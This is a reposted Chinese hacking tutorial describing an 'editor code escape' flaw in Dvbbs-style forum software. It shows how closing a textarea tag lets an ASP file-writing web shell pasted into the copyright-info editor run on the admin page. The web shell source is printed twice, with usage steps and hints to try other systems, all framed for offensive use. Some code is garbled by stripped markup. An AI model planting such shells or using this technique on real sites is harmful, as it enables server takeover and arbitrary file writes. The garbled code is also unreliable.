编辑器代码逃逸漏洞 by蚊虫原创

番茄系统家园 · 2022-03-13 02:14:35

好 版权信息 把他变成小马

编辑器代码逃逸漏洞 by蚊虫原创

成功保存

但是没有被执行..

应该是马的问题

编辑器代码逃逸漏洞 by蚊虫原创

马儿不行 当然是更换了 这不 怪事出现了 你看..

编辑器代码逃逸漏洞 by蚊虫原创

看 命令成功完成! 非法操作!       这这么跑出来了?????????????

真是怪了难道我的马儿真的长褪了?

研究了一下中以明白是怎么回事了..

看看我的马儿的代码,注意红色的标记



" size="53">
   蚊虫专用
textarea name=cyfddata rows="11" cols="90">
dim objFSO
dim fdat
dim objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("syfdpath"))"" then
fdata = request("cyfddata")
Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
objCountFile.Write fdata
if err =0 then %>

命令成功完成!

非法操作!
end if
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
%>

再看看网页的源代码,注意橙色的标记

论坛版权信息



 


 



" size="53">
   蚊虫专用

dim objFSO
dim fdat
dim objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("syfdpath"))"" then
fdata = request("cyfddata")
Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
objCountFile.Write fdata
if err =0 then %>

命令成功完成!

非法操作!
end if
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
%>


看不明白?

我来解释一下

看网页的源代码

这是文本框的开头标记

尔我的小马里面又有一个文本框结束的标记

所以浏览器就把

以下的代码解释为文本框以外的位置了...

呵呵 这就相当于把 以下的代码 写进了这个编辑页面里面...

明白了吧

这对我们很有用处

使用

在小马最上面加上

保存

然后重新编辑

这时 我们的小马已经被'写入"编辑页面

编辑器代码逃逸漏洞 by蚊虫原创

剩下的就不用说了吧.....哈哈 淫荡去咯....编辑器代码逃逸漏洞 by蚊虫原创

ps:不光是动网 还有其他的系统都有类似的漏洞

ps:不要吧思维光死停留在这里..想想我们可以.....

PS:有可能运行不了,这取决于你的马.

免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/wlaq/172200cbcYY9.html
猜你喜欢
最新应用
热门应用